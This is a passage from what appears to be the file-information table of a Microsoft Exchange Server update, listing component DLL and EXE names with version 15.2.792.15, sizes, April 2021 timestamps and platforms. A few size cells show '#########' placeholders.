\nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.2.792.15| 14,216| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.2.792.15| 14,712| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.2.792.15| 72,592| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.2.792.15| 22,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.diagnostics.dll| 15.2.792.15| 2,213,264| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.2.792.15| 2,213,264| 27-Apr-21| 11:30| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.2.792.15| 23,944| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.2.792.15| 546,680| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.2.792.15| 215,440| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.2.792.15| 194,424| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.2.792.15| 146,296| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.2.792.15| 27,528| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.2.792.15| 13,704| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.2.792.15| 49,528| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.2.792.15| 28,048| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.directory.topologyservice.exe| 15.2.792.15| 208,760| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.disklocker.events.dll| 15.2.792.15| 88,968| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.disklocker.interop.dll| 15.2.792.15| 32,656| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.drumtesting.calendarmigration.dll| 15.2.792.15| 45,944| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.drumtesting.common.dll| 15.2.792.15| 18,832| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.dxstore.dll| 15.2.792.15| 473,480| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.dxstore.ha.events.dll| 15.2.792.15| 206,200| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.dxstore.ha.instance.exe| 15.2.792.15| 36,728| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.eac.flighting.dll| 15.2.792.15| 131,448| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.edgecredentialsvc.exe| 15.2.792.15| 21,904| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.edgesync.common.dll| 15.2.792.15| 148,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.edgesync.datacenterproviders.dll| 15.2.792.15| 220,024| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.edgesync.eventlog.dll| 15.2.792.15| 23,952| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.edgesyncsvc.exe| 15.2.792.15| 97,656| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.ediscovery.export.dll| 15.2.792.15| 1,266,064| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.ediscovery.export.dll.deploy| 15.2.792.15| 1,266,064| 27-Apr-21| 11:33| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.application| Not applicable| 16,483| 27-Apr-21| 11:34| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.exe.deploy| 15.2.792.15| 87,432| 27-Apr-21| 11:30| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.manifest| Not applicable| 67,489| 27-Apr-21| 11:34| Not applicable \nMicrosoft.exchange.ediscovery.exporttool.strings.dll.deploy| 15.2.792.15| 52,112| 27-Apr-21| 11:30| Not applicable \nMicrosoft.exchange.ediscovery.mailboxsearch.dll| 15.2.792.15| 291,720| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.birthdaycalendar.dll| 15.2.792.15| 73,096| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.booking.defaultservicesettings.dll| 15.2.792.15| 45,968| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.booking.dll| 15.2.792.15| 218,512| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.booking.management.dll| 15.2.792.15| 78,216| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.bookings.dll| 15.2.792.15| 35,728| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.calendaring.dll| 15.2.792.15| 935,304| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.common.dll| 15.2.792.15| 336,248| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.connectors.dll| 15.2.792.15| 52,624| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.contentsubmissions.dll| 15.2.792.15| 32,144| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.context.dll| 15.2.792.15| 60,792| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.datamodel.dll| 15.2.792.15| 854,408| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.fileproviders.dll| 15.2.792.15| 291,728| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.foldersharing.dll| 15.2.792.15| 39,312| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.holidaycalendars.dll| 15.2.792.15| 76,168| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.insights.dll| 15.2.792.15| 166,800| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.meetinglocation.dll| 15.2.792.15| 1,486,712| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.meetingparticipants.dll| 15.2.792.15| 122,232| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.meetingtimecandidates.dll| 15.2.792.15| #########| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.onlinemeetings.dll| 15.2.792.15| 264,072| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.people.dll| 15.2.792.15| 37,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.peopleinsights.dll| 15.2.792.15| 186,760| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.reminders.dll| 15.2.792.15| 64,400| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.schedules.dll| 15.2.792.15| 83,832| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.entities.shellservice.dll| 15.2.792.15| 63,888| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.tasks.dll| 15.2.792.15| 100,232| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entities.xrm.dll| 15.2.792.15| 144,784| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.entityextraction.calendar.dll| 15.2.792.15| 270,200| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.eserepl.common.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.eserepl.configuration.dll| 15.2.792.15| 15,736| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.eserepl.dll| 15.2.792.15| 130,448| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.ews.configuration.dll| 15.2.792.15| 254,344| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.exchangecertificate.eventlog.dll| 15.2.792.15| 13,192| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.exchangecertificateservicelet.dll| 15.2.792.15| 37,264| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.extensibility.internal.dll| 15.2.792.15| 640,912| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.extensibility.partner.dll| 15.2.792.15| 37,256| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.federateddirectory.dll| 15.2.792.15| 146,320| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.ffosynclogmsg.dll| 15.2.792.15| 13,176| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.frontendhttpproxy.dll| 15.2.792.15| 596,352| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.frontendhttpproxy.eventlogs.dll| 15.2.792.15| 14,720| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.frontendtransport.monitoring.dll| 15.2.792.15| 30,088| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.griffin.variantconfiguration.dll| 15.2.792.15| 99,704| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.hathirdpartyreplication.dll| 15.2.792.15| 42,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.helpprovider.dll| 15.2.792.15| 40,328| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.httpproxy.addressfinder.dll| 15.2.792.15| 54,160| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.httpproxy.common.dll| 15.2.792.15| 164,216| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.httpproxy.diagnostics.dll| 15.2.792.15| 58,760| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.httpproxy.flighting.dll| 15.2.792.15| 204,152| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.httpproxy.passivemonitor.dll| 15.2.792.15| 17,784| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.httpproxy.proxyassistant.dll| 15.2.792.15| 30,600| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.httpproxy.routerefresher.dll| 15.2.792.15| 38,776| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.httpproxy.routeselector.dll| 15.2.792.15| 48,528| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.httpproxy.routing.dll| 15.2.792.15| 180,600| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.httpredirectmodules.dll| 15.2.792.15| 36,744| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.httputilities.dll| 15.2.792.15| 26,000| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.hygiene.data.dll| 15.2.792.15| 1,868,168| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.hygiene.diagnosisutil.dll| 15.2.792.15| 54,672| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.hygiene.eopinstantprovisioning.dll| 15.2.792.15| 35,704| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.idserialization.dll| 15.2.792.15| 35,728| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.imap4.eventlog.dll| 15.2.792.15| 18,320| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.imap4.eventlog.dll.fe| 15.2.792.15| 18,320| 27-Apr-21| 11:33| Not applicable \nMicrosoft.exchange.imap4.exe| 15.2.792.15| 263,032| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.imap4.exe.fe| 15.2.792.15| 263,032| 27-Apr-21| 11:32| Not applicable \nMicrosoft.exchange.imap4service.exe| 15.2.792.15| 24,952| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.imap4service.exe.fe| 15.2.792.15| 24,952| 27-Apr-21| 11:34| Not applicable \nMicrosoft.exchange.imapconfiguration.dl1| 15.2.792.15| 53,128| 27-Apr-21| 11:31| Not applicable \nMicrosoft.exchange.inference.common.dll| 15.2.792.15| 216,976| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.inference.hashtagsrelevance.dll| 15.2.792.15| 32,120| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.inference.peoplerelevance.dll| 15.2.792.15| 282,000| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.inference.ranking.dll| 15.2.792.15| 18,816| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.inference.safetylibrary.dll| 15.2.792.15| 83,848| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.inference.service.eventlog.dll| 15.2.792.15| 15,232| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.infoworker.assistantsclientresources.dll| 15.2.792.15| 94,096| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.infoworker.common.dll| 15.2.792.15| 1,840,504| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.infoworker.eventlog.dll| 15.2.792.15| 71,544| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.infoworker.meetingvalidator.dll| 15.2.792.15| 175,480| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.instantmessaging.dll| 15.2.792.15| 45,944| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.irm.formprotector.dll| 15.2.792.15| 159,624| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.irm.msoprotector.dll| 15.2.792.15| 51,072| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.irm.ofcprotector.dll| 15.2.792.15| 45,960| 27-Apr-21| 11:32| x64 \nMicrosoft.exchange.isam.databasemanager.dll| 15.2.792.15| 32,120| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.isam.esebcli.dll| 15.2.792.15| 100,216| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.jobqueue.eventlog.dll| 15.2.792.15| 13,176| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.jobqueueservicelet.dll| 15.2.792.15| 271,224| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.killswitch.dll| 15.2.792.15| 22,416| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.killswitchconfiguration.dll| 15.2.792.15| 33,672| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.loganalyzer.analyzers.auditing.dll| 15.2.792.15| 18,312| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.certificatelog.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.cmdletinfralog.dll| 15.2.792.15| 27,520| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.easlog.dll| 15.2.792.15| 30,584| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ecplog.dll| 15.2.792.15| 22,416| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.eventlog.dll| 15.2.792.15| 66,424| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.ewslog.dll| 15.2.792.15| 29,576| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.griffinperfcounter.dll| 15.2.792.15| 19,832| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.loganalyzer.analyzers.groupescalationlog.dll| 15.2.792.15| 20,360| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.httpproxylog.dll| 15.2.792.15| 19,320| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.hxservicelog.dll| 15.2.792.15| 34,176| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.iislog.dll| 15.2.792.15| 103,824| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.lameventlog.dll| 15.2.792.15| 31,608| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.migrationlog.dll| 15.2.792.15| 15,760| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oabdownloadlog.dll| 15.2.792.15| 20,856| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.oauthcafelog.dll| 15.2.792.15| 16,248| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.analyzers.outlookservicelog.dll| 15.2.792.15| 49,016| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owaclientlog.dll| 15.2.792.15| 44,408| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.owalog.dll| 15.2.792.15| 38,288| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.analyzers.perflog.dll| 15.2.792.15| #########| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.analyzers.pfassistantlog.dll| 15.2.792.15| 29,072| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.rca.dll| 15.2.792.15| 21,392| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.analyzers.restlog.dll| 15.2.792.15| 24,440| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.store.dll| 15.2.792.15| 15,224| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.analyzers.transportsynchealthlog.dll| 15.2.792.15| 21,904| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.core.dll| 15.2.792.15| 89,488| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.auditing.dll| 15.2.792.15| 20,872| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.extensions.certificatelog.dll| 15.2.792.15| 26,496| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.cmdletinfralog.dll| 15.2.792.15| 21,384| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.common.dll| 15.2.792.15| 28,024| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.easlog.dll| 15.2.792.15| 28,560| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.errordetection.dll| 15.2.792.15| 36,232| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.ewslog.dll| 15.2.792.15| 16,768| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.griffinperfcounter.dll| 15.2.792.15| 19,856| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.extensions.groupescalationlog.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.extensions.httpproxylog.dll| 15.2.792.15| 17,280| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.hxservicelog.dll| 15.2.792.15| 19,848| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.iislog.dll| 15.2.792.15| 57,224| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.extensions.migrationlog.dll| 15.2.792.15| 17,800| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.oabdownloadlog.dll| 15.2.792.15| 18,808| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.oauthcafelog.dll| 15.2.792.15| 16,264| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.outlookservicelog.dll| 15.2.792.15| 17,800| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.owaclientlog.dll| 15.2.792.15| 15,248| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.owalog.dll| 15.2.792.15| 15,240| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.perflog.dll| 15.2.792.15| 52,600| 27-Apr-21| 11:34| x86 \nMicrosoft.exchange.loganalyzer.extensions.pfassistantlog.dll| 15.2.792.15| 18,312| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.rca.dll| 15.2.792.15| 34,168| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.restlog.dll| 15.2.792.15| 17,272| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loganalyzer.extensions.store.dll| 15.2.792.15| 18,832| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loganalyzer.extensions.transportsynchealthlog.dll| 15.2.792.15| 43,400| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.loguploader.dll| 15.2.792.15| 165,240| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.loguploaderproxy.dll| 15.2.792.15| 54,648| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxassistants.assistants.dll| 15.2.792.15| 9,057,160| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxassistants.attachmentthumbnail.dll| 15.2.792.15| 33,160| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxassistants.common.dll| 15.2.792.15| 124,296| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.mailboxassistants.crimsonevents.dll| 15.2.792.15| 82,824| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.mailboxassistants.eventlog.dll| 15.2.792.15| 14,216| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.mailboxassistants.rightsmanagement.dll| 15.2.792.15| 30,096| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxloadbalance.dll| 15.2.792.15| 661,384| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxloadbalance.serverstrings.dll| 15.2.792.15| 63,352| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.792.15| 175,504| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.792.15| 2,791,824| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.792.15| 53,136| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.792.15| 151,952| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.792.15| 966,520| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.792.15| 185,232| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.792.15| 31,624| 27-Apr-21| 11:34| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.792.15| 39,824| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.792.15| 105,872| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.792.15| 95,120| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.792.15| 43,408| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.792.15| 18,832| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.792.15| 172,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.792.15| 102,800| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.792.15| 98,704| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.792.15| 188,816| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.792.15| 43,408| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.792.15| 447,352| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.792.15| 89,976| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.792.15| 107,912| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.792.15| 371,080| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.792.15| 193,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.792.15| 552,336| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.792.15| 16,264| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.792.15| 15,752| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.792.15| 321,408| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.792.15| 17,808| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.792.15| 45,448| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.792.15| 18,312| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.792.15| 12,664| 27-Apr-21| 11:35| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.792.15| 20,856| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.792.15| 415,096| 27-Apr-21| 11:31| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.792.15| 1,269,624| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.792.15| 39,288| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.792.15| 433,040| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.792.15| 4,563,320| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.792.15| 261,000| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.792.15| 33,656| 27-Apr-21| 11:30| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.792.15| 94,088| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.792.15| 586,104| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.792.15| 3,543,424| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.792.15| 67,984| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.dll| 15.2.792.15| #########| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.792.15| 58,768| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.792.15| 23,944| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.792.15| 101,752| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.792.15| 544,144| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.792.15| 305,040| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.792.15| 273,792| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.792.15| 418,704| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.792.15| 275,848| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.792.15| 70,536| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.792.15| 7,873,928| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.792.15| 1,502,072| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.792.15| 71,560| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.792.15| 1,249,168| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.792.15| 1,876,368| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.792.15| 5,366,672| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.792.15| 36,232| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.792.15| 117,640| 27-Apr-21| 11:30| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.792.15| 209,784| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.792.15| 79,760| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.792.15| 17,280| 27-Apr-21| 11:33| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.792.15| 156,040| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.792.15| 65,912| 27-Apr-21| 11:35| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.792.15| 30,600| 27-Apr-21| 11:31| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.792.15| 58,256| 27-Apr-21| 11:32| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.792.15| 29,576| 27-Apr-21| 11:33| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.792.15| 175,504| 27-Apr-21| 11:36| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.792.15| 28,560| 27-Apr-21| 11:31| x86 